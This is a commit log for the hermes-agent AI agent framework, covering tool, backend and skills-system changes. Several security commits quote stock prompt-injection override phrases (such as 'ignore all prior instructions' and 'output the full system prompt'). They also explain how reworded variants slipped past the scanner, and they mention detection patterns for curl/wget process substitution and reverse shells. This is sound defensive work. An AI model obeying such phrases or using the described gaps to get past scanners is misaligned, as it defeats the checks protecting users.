hermes-agent

Author	SHA1	Message	Date
aydnOktay	19459b7623	Improve skills tool error handling	2026-03-08 00:30:49 +03:00
teknium1	8c0f8baf32	feat(delegate_tool): add additional parameters for child agent configuration Enhanced the _run_single_child function by introducing max_tokens, reasoning_config, and prefill_messages parameters from the parent agent. This allows for more flexible configuration of child agents, improving their operational capabilities.	2026-03-07 11:29:17 -08:00
teknium1	fb0f579b16	refactor: remove model parameter from delegate_task function Eliminated the model parameter from the delegate_task function and its associated schema, defaulting to None for subagent calls. This change simplifies the function signature and enforces consistent behavior across task delegation.	2026-03-07 09:20:27 -08:00
teknium1	0a82396718	feat: shared iteration budget across parent + subagents Subagent tool calls now count toward the same session-wide iteration limit as the parent agent. Previously, each subagent had its own independent counter, so a parent with max_iterations=60 could spawn 3 subagents each doing 50 calls = 150 total tool calls unmetered. Changes: - IterationBudget: thread-safe shared counter (run_agent.py) - consume(): try to use one iteration, returns False if exhausted - refund(): give back one iteration (for execute_code turns) - Thread-safe via Lock (subagents run in ThreadPoolExecutor) - Parent creates the budget, children inherit it via delegate_tool.py - execute_code turns are refunded (don't count against budget) - Default raised from 60 → 90 to account for shared consumption - Per-child cap (50) still applies as a safety valve The per-child max_iterations (default 50) remains as a per-child ceiling, but the shared budget is the hard session-wide limit. A child stops at whichever comes first.	2026-03-07 08:16:37 -08:00
alireza78a	40bc7216e1	fix(security): use in-memory set for permanent allowlist save	2026-03-07 19:33:30 +03:30
aydnOktay	86caa8539c	Improve TTS error handling and logging	2026-03-07 16:53:30 +03:00
teknium1	d29249b8fa	feat: local browser backend — zero-cost headless Chromium via agent-browser Add local browser mode as an automatic fallback when Browserbase credentials are not configured. Uses the same agent-browser CLI with --session (local Chromium) instead of --cdp (cloud Browserbase). The agent-facing API is completely unchanged — all 10 browser_* tools produce identical output in both modes. Auto-detection: - BROWSERBASE_API_KEY set → cloud mode (existing behavior) - No key → local mode (new, free, headless Chromium) Changes: - _is_local_mode(): auto-detect based on env vars - _create_local_session(): lightweight session (no API call) - _get_session_info(): branches on local vs cloud - _run_browser_command(): --session in local, --cdp in cloud - check_browser_requirements(): only needs agent-browser CLI in local mode - _emergency_cleanup: CLI close in local, API release in cloud - cleanup_browser/browser_close: skip BB API calls in local mode - Registry: removed requires_env — check_fn handles both modes Setup for local mode: npm install -g agent-browser agent-browser install # downloads Chromium agent-browser install --with-deps # also installs system libs (Docker/Debian) Closes #374 (Phase 1)	2026-03-07 01:14:57 -08:00
teknium1	f668e9fc75	feat: platform-conditional skill loading + Apple/macOS skills Add a 'platforms' field to SKILL.md frontmatter that restricts skills to specific operating systems. Skills with platforms: [macos] only appear in the system prompt, skills_list(), and slash commands on macOS. Skills without the field load everywhere (backward compatible). Implementation: - skill_matches_platform() in tools/skills_tool.py — core filter - Wired into all 3 discovery paths: prompt_builder.py, skills_tool.py, skill_commands.py - 28 new tests across 3 test files New bundled Apple/macOS skills (all platforms: [macos]): - imessage — Send/receive iMessages via imsg CLI - apple-reminders — Manage Reminders via remindctl CLI - apple-notes — Manage Notes via memo CLI - findmy — Track devices/AirTags via AppleScript + screen capture Docs updated: CONTRIBUTING.md, AGENTS.md, creating-skills.md, skills.md (user guide)	2026-03-07 00:47:54 -08:00
teknium1	69a36a3361	Merge PR #309 : fix(timezone): timezone-aware now() for prompt, cron, and execute_code Authored by areu01or00. Adds timezone support via hermes_time.now() helper with IANA timezone resolution (HERMES_TIMEZONE env → config.yaml → server-local). Updates system prompt timestamp, cron scheduling, and execute_code sandbox TZ injection. Includes config migration (v4→v5) and comprehensive test coverage.	2026-03-07 00:04:41 -08:00
teknium1	479dfc096a	Merge PR #473 : Update model id in OpenRouter from minimax-m2.1 to minimax-m2.5 Authored by tars90percent. Updates remaining minimax-m2.1 references to minimax-m2.5 in rl_training_tool.py and docs.	2026-03-06 18:43:18 -08:00
alireza78a	a857321463	fix(code-execution): close server socket in finally block to prevent fd leak	2026-03-07 05:49:48 +03:30
teknium1	f75b1d21b4	fix: execute_code and delegate_task now respect disabled toolsets When a user disables the web toolset via 'hermes tools', the execute_code schema description still hardcoded web_search/web_extract as available, causing the model to keep trying to use them. Similarly, delegate_task always defaulted to ['terminal', 'file', 'web'] for subagents regardless of the parent's config. Changes: - execute_code schema is now built dynamically via build_execute_code_schema() based on which sandbox tools are actually enabled - model_tools.py rebuilds the execute_code schema at definition time using the intersection of sandbox-allowed and session-enabled tools - delegate_task now inherits the parent agent's enabled_toolsets instead of hardcoding DEFAULT_TOOLSETS when no explicit toolsets are specified - delegate_task description updated to say 'inherits your enabled toolsets' Reported by kotyKD on Discord.	2026-03-06 17:36:14 -08:00
0xbyt4	211b55815e	fix: prevent data loss in skills sync on copy/update failure Two bugs in sync_skills(): 1. Failed copytree poisons manifest: when shutil.copytree fails (disk full, permission error), the skill is still recorded in the manifest. On the next sync, the skill appears as "in manifest but not on disk" which is interpreted as "user deliberately deleted it" — the skill is never retried. Fix: only write to manifest on successful copy. 2. Failed update destroys user copy: rmtree deletes the existing skill directory before copytree runs. If copytree then fails, the user's skill is gone with no way to recover. Fix: move to .bak before copying, restore from backup if copytree fails. Both bugs are proven by new regression tests that fail on the old code and pass on the fix.	2026-03-07 03:58:32 +03:00
teknium1	4f56e31dc7	fix: track origin hashes in skills manifest to preserve user modifications Upgrade skills_sync manifest to v2 format (name:origin_hash). The origin hash records the MD5 of the bundled skill at the time it was last synced. On update, the user's copy is compared against the origin hash: - User copy == origin hash → unmodified → safe to update from bundled - User copy != origin hash → user customized → skip (preserve changes) v1 manifests (plain names) are auto-migrated: the user's current hash becomes the baseline, so future syncs can detect modifications. Output now shows user-modified skills: ~ whisper (user-modified, skipping) 27 tests covering all scenarios including v1→v2 migration, user modification detection, update after migration, and origin hash tracking. 2009 tests pass.	2026-03-06 16:13:58 -08:00
teknium1	ab0f4126cf	fix: restore all removed bundled skills + fix skills sync system - Restored 21 skills removed in commits `757d012` and `740dd92`: accelerate, audiocraft, code-review, faiss, flash-attention, gguf, grpo-rl-training, guidance, llava, nemo-curator, obliteratus, peft, pytorch-fsdp, pytorch-lightning, simpo, slime, stable-diffusion, tensorrt-llm, torchtitan, trl-fine-tuning, whisper - Rewrote sync_skills() with proper update semantics: * New skills (not in manifest): copied to user dir * Existing skills (in manifest + on disk): updated via hash comparison * User-deleted skills (in manifest, not on disk): respected, not re-added * Stale manifest entries (removed from bundled): cleaned from manifest - Added sync_skills() to CLI startup (cmd_chat) and gateway startup (start_gateway) — previously only ran during 'hermes update' - Updated cmd_update output to show new/updated/cleaned counts - Rewrote tests: 20 tests covering manifest CRUD, dir hashing, fresh install, user deletion respect, update detection, stale cleanup, and name collision handling 75 bundled skills total. 2002 tests pass.	2026-03-06 15:57:30 -08:00
aydnOktay	566aeaeefa	Make skill file writes atomic	2026-03-07 00:49:10 +03:00
Himess	7a0544ab57	fix: three small inconsistencies across cron, gateway, and daytona 1. cron/jobs.py: respect HERMES_HOME env var for job storage path. scheduler.py already uses os.getenv("HERMES_HOME", ...) but jobs.py hardcodes Path.home() / ".hermes", causing path mismatch when HERMES_HOME is set. 2. gateway/run.py: add Platform.HOMEASSISTANT to default_toolset_map and platform_config_key. The adapter and hermes-homeassistant toolset both exist but the mapping dicts omit it, so HomeAssistant events silently fall back to the Telegram toolset. 3. tools/environments/daytona.py: use time.monotonic() for deadline instead of float subtraction. All other backends (docker, ssh, singularity, local) use monotonic clock for timeout tracking. The accumulator pattern (deadline -= 0.2) drifts because t.join(0.2) + interrupt checks take longer than 0.2s per iteration.	2026-03-06 16:52:17 +03:00
teknium1	d63b363cde	refactor: extract atomic_json_write helper, add 24 checkpoint tests Extract the duplicated temp-file + fsync + os.replace pattern from batch_runner.py (1 instance) and process_registry.py (2 instances) into a shared utils.atomic_json_write() function. Add 12 tests for atomic_json_write covering: valid JSON, parent dir creation, overwrite, crash safety (original preserved on error), no temp file leaks, string paths, unicode, custom indent, concurrent writes. Add 12 tests for batch_runner checkpoint behavior covering: _save_checkpoint (valid JSON, last_updated, overwrite, lock/no-lock, parent dirs, no temp leaks), _load_checkpoint (missing file, existing data, corrupt JSON), and resume logic (preserves prior progress, different run_name starts fresh).	2026-03-06 05:50:12 -08:00
teknium1	c05c60665e	Merge PR #298 : Make process_registry checkpoint writes atomic Authored by aydnOktay. Companion to PR #297 (batch_runner). Applies the same atomic write pattern (temp file + fsync + os.replace) to both _write_checkpoint() and recover_from_checkpoint() in process_registry.py. Prevents checkpoint corruption on gateway crashes. Also improves error handling: bare 'pass' replaced with logger.debug(..., exc_info=True) for better debugging.	2026-03-06 05:32:35 -08:00
Himess	453e0677d6	fix: use regex for search output parsing to handle Windows drive-letter paths The ripgrep/grep output parser uses `split(':', 2)` to extract file:lineno:content from match lines. On Windows, absolute paths contain a drive letter colon (e.g. `C:\Users\foo\bar.py:42:content`), so `split(':', 2)` produces `["C", "\Users\...", "42:content"]`. `int(parts[1])` then raises ValueError and the match is silently dropped. All search results are lost on Windows. Same category as #390 — string-based path parsing that fails on Windows. Replace `split()` with a regex that optionally captures the drive letter prefix: `^([A-Za-z]:)?(.?):(\d+):(.)$`. Applied to both `_search_with_rg` and `_search_with_grep`.	2026-03-06 15:54:33 +03:00
teknium1	3670089a42	docs: add Daytona to batch_runner, process_registry, agent_loop, tool_context Add daytona_image to batch_runner per-prompt container image overrides so batch processing works with the Daytona backend. Update inline comments in RL environment files (agent_loop, tool_context) and process_registry docstrings to include Daytona in backend lists.	2026-03-06 03:49:59 -08:00
teknium1	3982fcf095	fix: sync execute_code sandbox stubs with real tool schemas The _TOOL_STUBS dict in code_execution_tool.py was out of sync with the actual tool schemas, causing TypeErrors when the LLM used parameters it sees in its system prompt but the sandbox stubs didn't accept: search_files: - Added missing params: context, offset, output_mode - Fixed target default: 'grep' → 'content' (old value was obsolete) patch: - Added missing params: mode, patch (V4A multi-file patch support) Also added 4 drift-detection tests (TestStubSchemaDrift) that will catch future divergence between stubs and real schemas: - test_stubs_cover_all_schema_params: every schema param in stub - test_stubs_pass_all_params_to_rpc: every stub param sent over RPC - test_search_files_target_uses_current_values: no obsolete values - test_generated_module_accepts_all_params: generated code compiles All 28 tests pass.	2026-03-06 03:40:06 -08:00
teknium1	8481fdcf08	docs: complete Daytona backend documentation coverage Update all remaining files that enumerate terminal backends to include Daytona. Covers security docs (bypass info, backend comparison table), environment variables reference (DAYTONA_API_KEY, TERMINAL_DAYTONA_IMAGE, container resources header), AGENTS.md (architecture tree, config keys), environments/README.md, hermes_base_env.py field description, and various module docstrings. Follow-up to PR #451 merge.	2026-03-06 03:37:05 -08:00
teknium1	39299e2de4	Merge PR #451 : feat: Add Daytona environment backend Authored by rovle. Adds Daytona as the sixth terminal execution backend with cloud sandboxes, persistent workspaces, and full CLI/gateway integration. Includes 24 unit tests and 8 integration tests.	2026-03-06 03:32:40 -08:00
teknium1	efec4fcaab	feat(execute_code): add json_parse, shell_quote, retry helpers to sandbox The execute_code sandbox generates a hermes_tools.py stub module for LLM scripts. Three common failure modes keep tripping up scripts: 1. json.loads(strict=True) rejects control chars in terminal() output (e.g., GitHub issue bodies with literal tabs/newlines) 2. Shell backtick/quote interpretation when interpolating dynamic content into terminal() commands (markdown with backticks gets eaten by bash) 3. No retry logic for transient network failures (API timeouts, rate limits) Adds three convenience helpers to the generated hermes_tools module: - json_parse(text) — json.loads with strict=False for tolerant parsing - shell_quote(s) — shlex.quote() for safe shell interpolation - retry(fn, max_attempts=3, delay=2) — exponential backoff wrapper Also updates the EXECUTE_CODE_SCHEMA description to document these helpers so LLMs know they're available without importing anything extra. Includes 7 new tests (unit + integration) covering all three helpers.	2026-03-06 01:52:46 -08:00
teknium1	f6f3d1de9b	fix: review fixes — path traversal guard, trust_style consistency, edge cases Address code review findings: Security (Medium): - Path traversal guard in OptionalSkillSource.fetch() — resolve() and validate that the path stays within optional-skills/ before reading Bug fixes (Medium): - Add 'builtin' to trust_style dicts in do_inspect() and _resolve_short_name() — official skills now show bright_cyan 'official' label consistently across all display functions (5/5 dicts fixed) Edge cases (Low): - Clamp page_size to [1, 100] in do_browse() to prevent ZeroDivisionError - Update SkillMeta.source docstring to include 'official' - Add browse command to optional-skills/DESCRIPTION.md	2026-03-06 01:40:01 -08:00
teknium1	f2e24faaca	feat: optional skills — official skills shipped but not activated by default Add 'optional-skills/' directory for official skills that ship with the repo but are not copied to ~/.hermes/skills/ during setup. They are: - NOT shown to the model in the system prompt - NOT copied during hermes setup/update - Discoverable via 'hermes skills search' labeled as 'official' - Installable via 'hermes skills install' with builtin trust (no third-party warning) - Auto-categorized on install based on directory structure Implementation: - OptionalSkillSource adapter in tools/skills_hub.py (search/fetch/inspect) - Added to create_source_router() as first source (highest priority) - Trust level 'builtin' for official skills in skills_guard.py - Friendly install message for official skills (no third-party warning) - 'official' label in cyan in search results and skill list First optional skill: Blackbox CLI (autonomous-ai-agents/blackbox) - Multi-model coding agent with built-in judge/Chairman pattern - Delegates to Claude, Codex, Gemini, and Blackbox models - Open-source CLI (GPL-3.0, TypeScript, forked from Gemini CLI) - Requires paid Blackbox AI API key Refs: #475	2026-03-06 01:24:11 -08:00
tars90percent	32636ecf8a	Update MiniMax model ID from m2.1 to m2.5	2026-03-06 16:47:48 +08:00
teknium1	363633e2ba	fix: allow self-hosted Firecrawl without API key + add self-hosting docs On top of PR #460: self-hosted Firecrawl instances don't require an API key (USE_DB_AUTHENTICATION=false), so don't force users to set a dummy FIRECRAWL_API_KEY when FIRECRAWL_API_URL is set. Also adds a proper self-hosting section to the configuration docs explaining what you get, what you lose, and how to set it up (Docker stack, tradeoffs vs cloud). Added 2 more tests (URL-only without key, neither-set raises).	2026-03-05 16:44:21 -08:00
caentzminger	d7d10b14cd	feat(tools): add support for self-hosted firecrawl Adds optional FIRECRAWL_API_URL environment variable to support self-hosted Firecrawl deployments alongside the cloud service. - Add FIRECRAWL_API_URL to optional env vars in hermes_cli/config.py - Update _get_firecrawl_client() in tools/web_tools.py to accept custom API URL - Add tests for client initialization with/without URL - Document new env var in installation and config guides	2026-03-05 16:16:18 -06:00
shitcoinsherpa	dcba291d45	Use pywinpty instead of ptyprocess on Windows for PTY support ptyprocess depends on Unix-only APIs (fork, openpty) and cannot work on Windows at all. pywinpty provides a compatible PtyProcess interface using the Windows ConPTY API. This conditionally imports winpty.PtyProcess on Windows and ptyprocess.PtyProcess on Unix. The pyproject.toml pty extra now uses platform markers so the correct package is installed automatically.	2026-03-05 17:16:04 -05:00
rovle	a6499b6107	fix(daytona): use shell timeout wrapper instead of broken SDK exec timeout The Daytona SDK's process.exec(timeout=N) parameter is not enforced — the server-side timeout never fires and the SDK has no client-side fallback, causing commands to hang indefinitely. Fix: wrap commands with timeout N sh -c '...' (coreutils) which reliably kills the process and returns exit code 124. Added shlex.quote for proper shell escaping and a secondary deadline (timeout + 10s) that force-stops the sandbox if the shell timeout somehow fails. Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 13:12:41 -08:00
rovle	efc7a7b957	fix(daytona): don't guess /root on cwd probe failure, keep constructor default; update tests to reflect this Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 11:49:35 -08:00
rovle	4f1464b3af	fix(daytona): default disk to 10GB to match platform limit Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 11:37:30 -08:00
rovle	577da79a47	fix(daytona): make disk cap visible and use SDK enum for sandbox state - Replace logger.warning with warnings.warn for the disk cap so users actually see it (logger was suppressed by CLI's log level config) - Use SandboxState enum instead of string literals in _ensure_sandbox_ready Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 11:03:39 -08:00
rovle	1faa9648d3	chore(daytona): cap the disk size to current maximum on daytona sandboxes Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 10:43:41 -08:00
rovle	435530018b	fix(daytona): resolve cwd by detecting home directory inside the sandbox	2026-03-05 10:02:22 -08:00
rovle	c43451a50b	feat(terminal): integrate Daytona backend into tool pipeline Add Daytona to image selection, container_config guards, environment factory, requirements check, and diagnostics in terminal_tool.py and file_tools.py. Also add to sandboxed-backend approval bypass. Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 10:02:21 -08:00
rovle	1e312c6582	feat(environments): add Daytona cloud sandbox backend New execution backend using the Daytona Python SDK. Supports persistent sandboxes via stop/start lifecycle, interrupt handling, and automatic retry on transient errors. Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 10:02:21 -08:00
teknium1	ad9c26afb8	Merge PR #293 : fix: eliminate shell noise from terminal output and fix test failures Authored by 0xbyt4. Wraps commands with unique fence markers to isolate real output from shell init/exit noise (oh-my-zsh, macOS session restore, etc.). Falls back to expanded pattern-based cleaning. Also fixes BSD find fallback and test module shadowing.	2026-03-05 08:48:26 -08:00
aydnOktay	7d79ce92ac	Improve type hints and error diagnostics in vision_tools	2026-03-05 16:11:59 +03:00
teknium1	2465674fda	Merge PR #280 : fix: add missing dangerous command patterns (tee, process substitution, full-path rm) Authored by dogiladeveloper. Adds detection for tee writes to sensitive files, process substitution with curl/wget, and find -exec with full-path rm.	2026-03-05 01:56:44 -08:00
teknium1	2eca0d4af1	Merge PR #275 : fix(batch_runner): preserve traceback when batch worker fails Authored by batuhankocyigit. Adds explicit traceback logging for batch worker failures and improves tool dispatch error logging in registry.	2026-03-05 01:44:05 -08:00
rovle	ca33372595	fix: pass task_id to _create_environment as well, to prevent cross-session state mixing Signed-off-by: rovle <lovre.pesut@gmail.com>	2026-03-05 01:40:04 -08:00
teknium1	d0d9897e81	refactor: clean up transcription_tools after PR #262 merge - Fix incorrect error message (only VOICE_TOOLS_OPENAI_KEY is checked, not OPENAI_API_KEY) - Remove redundant FileNotFoundError catch (exists() check above already handles this) - Consolidate openai imports to single line - Sort SUPPORTED_FORMATS in error message for deterministic output	2026-03-04 21:35:04 -08:00
teknium1	9306a1e06a	Merge PR #262 : improve error handling and validation in transcription_tools Authored by aydnOktay. Adds file format and size validation before API calls, specific exception handling, and improved logging.	2026-03-04 21:33:03 -08:00
teknium1	141b12bd39	refactor: clean up type hints and docstrings in session_search_tool Follow-up to PR #261 merge: - Fix Optional[Any] → Union[int, float, str, None] (actually meaningful) - Fix _resolve_to_parent return type to str (never returns None in practice) - Trim verbose docstrings on internal helpers to single-line style - Correct docstring that claimed 'unknown' on failure (returns str(ts))	2026-03-04 21:25:54 -08:00
teknium1	ae3deff8d4	Merge PR #261 : improve error handling and type hints in session_search_tool Authored by aydnOktay. Adds TimeoutError handling for session summarization, better exception specificity in _format_timestamp, defensive try/except in _resolve_to_parent, and type hints.	2026-03-04 21:23:56 -08:00
teknium1	8e901b31c1	Merge PR #214 : fix: align _apply_delete comment with actual behavior Authored by VolodymyrBg.	2026-03-04 20:47:47 -08:00
teknium1	e1baab90f7	Merge PR #201 : fix skills hub dedup to prefer higher trust levels Authored by 0xbyt4. The dedup logic in GitHubSource.search() and unified_search() used 'r.trust_level == "trusted"' which let trusted results overwrite builtin ones. Now uses ranked comparison: builtin (2) > trusted (1) > community (0).	2026-03-04 19:40:41 -08:00
teknium1	7128f95621	Merge PR #390 : fix hidden directory filter broken on Windows Authored by Farukest. Fixes #389. Replaces hardcoded forward-slash string checks ('/.git/', '/.hub/') with Path.parts membership test in _find_all_skills() and scan_skill_commands(). On Windows, str(Path) uses backslashes so the old filter never matched, causing quarantined skills to appear as installed.	2026-03-04 19:22:43 -08:00
teknium1	ffc6d767ec	Merge PR #388 : fix --force bypassing dangerous verdict in should_allow_install Authored by Farukest. Fixes #387. Removes 'and not force' from the dangerous verdict check so --force can never install skills with critical security findings (reverse shells, data exfiltration, etc). The docstring already documented this behavior but the code didn't enforce it.	2026-03-04 19:19:57 -08:00
teknium1	44a2d0c01f	Merge PR #386 : fix symlink boundary check prefix confusion in skills_guard Authored by Farukest. Fixes #385. Replaces startswith() with Path.is_relative_to() in _check_structure() symlink escape check — same fix pattern as skill_view() (PR #352). Prevents symlinks escaping to sibling directories with shared name prefixes.	2026-03-04 19:13:21 -08:00
teknium1	ff3a479156	fix: coerce session_id and data to string in process tool handler Some models send session_id as an integer instead of a string, causing type errors downstream. Defensively cast session_id and write/submit data args to str to handle non-compliant model outputs.	2026-03-04 16:37:00 -08:00
teknium1	093acd72dd	fix: catch exceptions from check_fn in is_toolset_available() get_definitions() already wrapped check_fn() calls in try/except, but is_toolset_available() did not. A failing check (network error, missing import, bad config) would propagate uncaught and crash the CLI banner, agent startup, and tools-info display. Now is_toolset_available() catches all exceptions and returns False, matching the existing pattern in get_definitions(). Added 4 tests covering exception handling in is_toolset_available(), check_toolset_requirements(), get_definitions(), and check_tool_availability(). Closes #402	2026-03-04 14:22:30 -08:00
Farukest	f93b48226c	fix: use Path.parts for hidden directory filter in skill listing The hidden directory filter used hardcoded forward-slash strings like '/.git/' and '/.hub/' to exclude internal directories. On Windows, Path returns backslash-separated strings, so the filter never matched. This caused quarantined skills in .hub/quarantine/ to appear as installed skills and available slash commands on Windows. Replaced string-based checks with Path.parts membership test which works on both Windows and Unix.	2026-03-04 18:34:16 +03:00
Farukest	4805be0119	fix: prevent --force from overriding dangerous verdict in should_allow_install The docstring states --force should never override dangerous verdicts, but the condition `if result.verdict == "dangerous" and not force` allowed force=True to skip the early return. Execution then fell through to `if force: return True`, bypassing the policy block. Removed `and not force` so dangerous skills are always blocked regardless of the --force flag.	2026-03-04 18:10:18 +03:00
Farukest	a3ca71fe26	fix: use is_relative_to() for symlink boundary check in skills_guard The symlink escape check in _check_structure() used startswith() without a trailing separator. A symlink resolving to a sibling directory with a shared prefix (e.g. 'axolotl-backdoor') would pass the check for 'axolotl' since the string prefix matched. Replaced with Path.is_relative_to() which correctly handles directory boundaries and is consistent with the skill_view path check.	2026-03-04 17:23:23 +03:00
teknium1	70a0a5ff4a	fix: exclude current session from session_search results session_search was returning the current session if it matched the query, which is redundant — the agent already has the current conversation context. This wasted an LLM summarization call and a result slot. Added current_session_id parameter to session_search(). The agent passes self.session_id and the search filters out any results where either the raw or parent-resolved session ID matches. Both the raw match and the parent-resolved match are checked to handle child sessions from delegation. Two tests added verifying the exclusion works and that other sessions are still returned.	2026-03-04 06:06:40 -08:00
teknium1	021f62cb0c	fix(security): patch multi-word bypass in 8 more injection patterns Systematic audit of all prompt injection regexes in skills_guard.py found 8 more patterns with the same single-word gap vulnerability fixed in PR #192. Multi-word variants like 'pretend that you are', 'output the full system prompt', 'respond without your safety filters', etc. all bypassed the scanner. Fixed patterns: - you are [now] → you are [... now] - do not [tell] the user → do not [... tell ... the] user - pretend [you are\|to be] → pretend [... you are\|to be] - output the [system\|initial] prompt → output [... system\|initial] prompt - act as if you [have no] [restrictions] → act as if [... you ... have no ... restrictions] - respond without [restrictions] → respond without [... restrictions] - you have been [updated] to → you have been [... updated] to - share [the] [entire] [conversation] → share [... conversation] All use (?:\w+\s+)* to allow arbitrary intermediate words.	2026-03-04 06:00:41 -08:00
teknium1	ba214e43c8	fix(security): apply same multi-word bypass fix to disregard pattern The 'disregard ... instructions/rules/guidelines' regex had the same single-word gap vulnerability as the 'ignore' pattern fixed in PR #192. 'disregard all your instructions' bypassed the scanner. Added (?:\w+\s+)* between both keyword groups to allow arbitrary intermediate words.	2026-03-04 05:55:38 -08:00
teknium1	520a26c48f	Merge PR #192 : fix(security): catch multi-word prompt injection bypass in skills_guard Authored by 0xbyt4. The 'ignore ... instructions' regex only matched a single word between 'ignore' and the keyword (previous/all/above/prior). Multi-word variants like 'ignore all prior instructions' bypassed the scanner entirely.	2026-03-04 05:54:04 -08:00
teknium1	79871c2083	refactor: use Path.is_relative_to() for skill_view boundary check Replace the string-based startswith + os.sep approach with Path.is_relative_to() (Python 3.9+, we require 3.10+). This is the idiomatic pathlib way to check path containment — it handles separators, case sensitivity, and the equal-path case natively without string manipulation. Simplified tests to match: removed the now-unnecessary test_separator_is_os_native test since is_relative_to doesn't depend on separator choice.	2026-03-04 05:30:43 -08:00
Farukest	e86f391cac	fix: use os.sep in skill_view path boundary check for Windows compatibility	2026-03-04 06:50:06 +03:00
teknium1	ffec21236d	feat: enhance Home Assistant integration with service discovery and setup Improvements to the HA integration merged from PR #184: - Add ha_list_services tool: discovers available services (actions) per domain with descriptions and parameter fields. Tells the model what it can do with each device type (e.g. light.turn_on accepts brightness, color_name, transition). Closes the gap where the model had to guess available actions. - Add HA to hermes tools config: users can enable/disable the homeassistant toolset and configure HASS_TOKEN + HASS_URL through 'hermes tools' setup flow instead of manually editing .env. - Fix should-fix items from code review: - Remove sys.path.insert hack from gateway adapter - Replace all print() calls with proper logger (info/warning/error) - Move env var reads from import-time to handler-time via _get_config() - Add dedicated REST session reuse in gateway send() - Update ha_call_service description to reference ha_list_services for action discovery. - Update tests for new ha_list_services tool in toolset resolution.	2026-03-03 05:16:53 -08:00
areu01or00	a1c25046a9	fix(timezone): add timezone-aware clock across agent, cron, and execute_code	2026-03-03 18:23:40 +05:30
0xbyt4	aefc330b8f	merge: resolve conflict with main (add mcp + homeassistant extras)	2026-03-03 14:52:22 +03:00
0xbyt4	f967471758	merge: resolve conflict with main (keep fence markers + _find_shell)	2026-03-03 14:50:45 +03:00
teknium1	de59d91add	feat: Windows native support via Git Bash - Add scripts/install.cmd batch wrapper for CMD users (delegates to install.ps1) - Add _find_shell() in local.py: detects Git Bash on Windows via HERMES_GIT_BASH_PATH env var, shutil.which, or common install paths (same pattern as Claude Code's CLAUDE_CODE_GIT_BASH_PATH) - Use _find_shell() in process_registry.py for background processes - Fix hermes_cli/gateway.py: use wmic instead of ps aux on Windows, skip SIGKILL (doesn't exist on Windows), fix venv path (Scripts/python.exe vs bin/python) - Update README with three install commands (Linux/macOS, PowerShell, CMD) and Windows native documentation Requires Git for Windows, which bundles bash.exe. The terminal tool transparently uses Git Bash for shell commands regardless of whether the user launched hermes from PowerShell or CMD.	2026-03-02 22:03:29 -08:00
teknium1	7df14227a9	feat(mcp): banner integration, /reload-mcp command, resources & prompts Banner integration: - MCP Servers section in CLI startup banner between Tools and Skills - Shows each server with transport type, tool count, connection status - Failed servers shown in red; section hidden when no MCP configured - Summary line includes MCP server count - Removed raw print() calls from discovery (banner handles display) /reload-mcp command: - New slash command in both CLI and gateway - Disconnects all MCP servers, re-reads config.yaml, reconnects - Reports what changed (added/removed/reconnected servers) - Allows adding/removing MCP servers without restarting Resources & Prompts support: - 4 utility tools registered per server: list_resources, read_resource, list_prompts, get_prompt - Exposes MCP Resources (data sources) and Prompts (templates) as tools - Proper parameter schemas (uri for read_resource, name for get_prompt) - Handles text and binary resource content - 23 new tests covering schemas, handlers, and registration Test coverage: 74 MCP tests total, 1186 tests pass overall.	2026-03-02 19:15:59 -08:00
teknium1	60effcfc44	fix(mcp): parallel discovery, user-visible logging, config validation - Discovery is now parallel (asyncio.gather) instead of sequential, fixing the 60s shared timeout issue with multiple servers - Startup messages use print() so users see connection status even with default log levels (the 'tools' logger is set to ERROR) - Summary line shows total tools and failed servers count - Validate conflicting config: warn if both 'url' and 'command' are present (HTTP takes precedence) - Update TODO.md: mark MCP as implemented, list remaining work - Add test for conflicting config detection (51 tests total) All 1163 tests pass.	2026-03-02 19:02:28 -08:00
teknium1	64ff8f065b	feat(mcp): add HTTP transport, reconnection, security hardening Upgrades the MCP client implementation from PR #291 with: - HTTP/Streamable HTTP transport: support 'url' key in config for remote MCP servers (Notion, Slack, Sentry, Supabase, etc.) - Automatic reconnection with exponential backoff (1s-60s, 5 retries) when a server connection drops unexpectedly - Environment variable filtering: only pass safe vars (PATH, HOME, etc.) plus user-specified env to stdio subprocesses (prevents secret leaks) - Credential stripping: sanitize error messages before returning to the LLM (strips GitHub PATs, OpenAI keys, Bearer tokens, etc.) - Configurable per-server timeouts: 'timeout' and 'connect_timeout' keys - Fix shutdown race condition in servers_snapshot variable scoping Test coverage: 50 tests (up from 30), including new tests for env filtering, credential sanitization, HTTP config detection, reconnection logic, and configurable timeouts. All 1162 tests pass (1162 passed, 3 skipped, 0 failed).	2026-03-02 18:40:03 -08:00
teknium1	468b7fdbad	Merge PR #291 : feat: add MCP (Model Context Protocol) client support Authored by 0xbyt4. Adds MCP client with official SDK, direct tool registration, auto-injection into hermes-* toolsets, and graceful degradation.	2026-03-02 18:24:31 -08:00
teknium1	dd9d3f89b9	Merge PR #286 : Fix ClawHub Skills Hub adapter for API endpoint changes Authored by BP602. Fixes #285.	2026-03-02 17:25:14 -08:00
teknium1	2ba87a10b0	Merge PR #219 : fix: guard POSIX-only process functions for Windows compatibility Authored by Farukest. Fixes #218.	2026-03-02 17:07:49 -08:00
aydnOktay	5fa3e24b76	Make process_registry checkpoint writes atomic	2026-03-03 02:44:01 +03:00
0xbyt4	11615014a4	fix: eliminate shell noise from terminal output with fence markers - Wrap commands with unique fence markers (printf FENCE; cmd; printf FENCE) to isolate real output from shell init/exit noise (oh-my-zsh, macOS session restore/save, docker plugin errors, etc.) - Expand _clean_shell_noise to cover zsh/macOS patterns and strip from both beginning and end (fallback when fences are missing) - Fix BSD find compatibility: fallback to simple find when -printf produces empty output (macOS) - Fix test_terminal_disk_usage: use sys.modules to get the real module instead of the shadowed function from tools/__init__.py - Add 13 new unit tests for fence extraction and zsh noise patterns	2026-03-02 22:53:21 +03:00
